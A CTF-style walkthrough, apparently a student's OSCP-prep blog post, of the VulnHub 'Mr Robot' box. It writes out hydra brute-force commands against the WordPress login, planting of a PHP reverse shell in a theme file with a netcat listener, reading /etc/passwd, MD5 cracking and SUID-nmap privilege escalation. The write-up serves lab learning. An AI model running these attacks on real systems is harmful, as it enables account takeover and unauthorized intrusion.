Today we are doing the next box listed in the OSCP prep guide given from school. The machine is called Mrrobot, with a reference to the hacker series Mrrobot. A good one to watch! The machine can be downloaded on vulnhub at https://www.vulnhub.com/entry/mr-robot-1,151/
To find the machine on the network we used netdiscover. It showed us the IP 192.168.0.128. After reinstalling my Kali with the newest release it seems to be working again, although it took some time. Probably because of Vmware natting, but this isn’t to much of a problem.
Lets see what services are available by running a simple nmap scan, after this one is completed we will run a full scan to see if there is anything else running.
So there are a couple services. SSH, which is closed. Port 80 and port 443. Lets run Nikto and Dirb on port 80 and we have a look manually on the http and the https website. They both seem to be the same, looks like a terminal where we can put in some commands; see below
After looking around I didn’t found much on the website itself. Lets have a look at our Nikto and Dirb results.
Lets go from the top to the bottom. We found the following
- The wordpress version 4.3.22
- License saying it is running WordPress. Which we already knew
- /admin/index.html which is the same website again.
- /wp-login.php is a wordpress loginpage.
Before we do anything else, lets have a look at our Dirb results, this probably found the same or even more pages. The results are pretty long and it is still running scanning all the directories. This is the scan without going into the directories:
adeeli@Pentest:~$ dirb http://192.168.0.128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Feb 4 05:30:37 2020 URL_BASE: http://192.168.0.128/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.0.128/ ---- ==> DIRECTORY: http://192.168.0.128/0/ ==> DIRECTORY: http://192.168.0.128/admin/ + http://192.168.0.128/atom (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.0.128/audio/ ==> DIRECTORY: http://192.168.0.128/blog/ ==> DIRECTORY: http://192.168.0.128/css/ + http://192.168.0.128/dashboard (CODE:302|SIZE:0) + http://192.168.0.128/favicon.ico (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.128/feed/ ==> DIRECTORY: http://192.168.0.128/image/ ==> DIRECTORY: http://192.168.0.128/Image/ ==> DIRECTORY: http://192.168.0.128/images/ + http://192.168.0.128/index.html (CODE:200|SIZE:1188) + http://192.168.0.128/index.php (CODE:301|SIZE:0) + http://192.168.0.128/intro (CODE:200|SIZE:516314) ==> DIRECTORY: http://192.168.0.128/js/ + http://192.168.0.128/license (CODE:200|SIZE:19930) + http://192.168.0.128/login (CODE:302|SIZE:0) + http://192.168.0.128/page1 (CODE:301|SIZE:0) + http://192.168.0.128/phpmyadmin (CODE:403|SIZE:94) + http://192.168.0.128/rdf (CODE:301|SIZE:0) + http://192.168.0.128/readme (CODE:200|SIZE:7334) + http://192.168.0.128/robots (CODE:200|SIZE:41) + http://192.168.0.128/robots.txt (CODE:200|SIZE:41) + http://192.168.0.128/rss (CODE:301|SIZE:0) + http://192.168.0.128/rss2 (CODE:301|SIZE:0) + http://192.168.0.128/sitemap (CODE:200|SIZE:0) + http://192.168.0.128/sitemap.xml (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.128/video/ ==> DIRECTORY: http://192.168.0.128/wp-admin/ + http://192.168.0.128/wp-config (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.128/wp-content/ + http://192.168.0.128/wp-cron (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.128/wp-includes/ + http://192.168.0.128/wp-links-opml (CODE:200|SIZE:228) + http://192.168.0.128/wp-load (CODE:200|SIZE:0) + http://192.168.0.128/wp-login (CODE:200|SIZE:2747) + http://192.168.0.128/wp-mail (CODE:403|SIZE:3018) + http://192.168.0.128/wp-settings (CODE:500|SIZE:0) + http://192.168.0.128/wp-signup (CODE:302|SIZE:0) + http://192.168.0.128/xmlrpc (CODE:405|SIZE:42) + http://192.168.0.128/xmlrpc.php (CODE:405|SIZE:42)
So there is a file named robots.txt on the website and also in the admin dir(which contains nothing). The on in the root contains the following:
Seems like we got the first flag in a file named “key-1-of-3.txt”, we probably have to find the three flags on the box. Lets go to http://192.168.0.128/key-1-of-3.txt and it shows us the flag.
The other file fsocity.dic is a file we can download. But what is it? Before we have a look lets see if our full nmap port scan found any extra’s, and it did not. So lets have a look at this fsocity.dic file by using
file <filename>. But this doesn’t give us to much information.
Google tells us a .dic file is a dictionary file, so I catted the file and we see a long list of words and some random things as well:
The file seems to have 858160 entries. Dammn, are there any doubles? Yes there is alot, most of them are in there 75 times. With some help from a post in stackoverflow I was able to count the double lines and sort by number to see which were not in there that much. Seems like we found the second flag.
But I’m not sure, we will find out later. Lets format this dictionary file so we only have 1 entree of each word since maybe need to use it to bruteforce anything. I did this with the command
sort fsocity.dic | uniq > sorted.txt It now has 11451 lines.
So lets start bruteforcing the wordpress login page. I knew I had to use hydra but it has been a while since I have used it, so I googled a bit and came up with the following command:
hydra -L Downloads/sorted.txt -p dontknow 192.168.0.128 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64 We can first Lets break it down:
-L Downloads/sorted.txtto use our sorted wordlist
-p dontknowto use a password, in this case dontknow
192.168.0.28is the machine we attack
http-form-postthe request form, post
/wp-login.phpthe page path
:log=^USER^the username variable
&pwd=^PASS^the password variable
F=Invalid usernamethe invalid string
-t 64use 64 threads to speed it up a bit
After a couple minutes we found a user elliot. The main role in the mrrobot series.
We can use the same command, but built a bit different to bruteforce the password. I used the following command:
hydra -l elliot -P Downloads/sorted.txt 192.168.0.128 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=The password you entered' -t 64
We found the password and we are able to login to the wp-admin panel.
Seems like we are administrator and there is one other user:
I have done this before, we can upload a reverse shell and load the webpage to get a shell or add the php reverse shell to a php file. Lets try this out. First lets copy a reverse shell with the following command
cp /usr/share/webshells/php/php-reverse-shell.php ~/mrrobot/. Then we have to edit it so it connects back to our host and change the port. We changed it to 8080, then we have to start a listener with netcat.
nc -lvp 8080
Then we go to the wordpress dashboard and open the menu on the left, go to appereance then to editor and we change the 404.php file with the contents of the reverse shell. To be sure we store the 404.php file contents to a text file incase we need to reverse it. Now we need to make a 404 error on the website by requesting a page that doesn’t exist. Shouldn’t be to hard. So I made a post, went to preview and changed the url to get a 404 error and we got a shell.
We are the daemon user. Lets see what other users there are listed
$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false mysql:x:1001:1001::/home/mysql: varnish:x:999:999::/home/varnish: robot:x:1002:1002::/home/robot:
When I went to the homedirectory of Robot I found 2 files. The second key and a password.raw-md5 file. Md5 is a hashing format, this probably is a hash and we can read it.
So lets try to crack this hash with hashcat, while this was running I already found the decrypted value online: abcdefghijklmnopqrstuvwxyz. But lets see if hashcat can crack it in the background. We used the sorted.txt wordlist which we downloaded earlier. We can su to the robot user and cat the second key.
Now we have to find the third key, probably by getting root access. We have to find a priv escalation. I normally did this manually but I want to make myself familair with the scripts. So for this box I will use the linuxprivchecker.py again. We can get this from github. Lets download it, copy it to your /var/www/html folder so we can wget it on our target after we started the apache2 service. I did this in my previous if you want to find the commands. After wgetting the file we have to make it executable by using
chmod +x and we can run it. Lets have a look at the results, here are the interesting parts:
So lets try the first exploit, which didn’t work. Then I tried the cap_sys_admin exploit which didn’t work. Lets try the mysql and then we go to manual stuff. The second one gives errors, back to manual stuff. Seems like nmap has a suid bit. You can find the SUID bits set with the command
find / -perm -u=s -type f 2>/dev/null. Nmap should have a shell escape, as linuxprivchecker said.
We are root, but we have to find the third flag. Which I found in the root directory by doing
cd root. We found the third key and completed the box!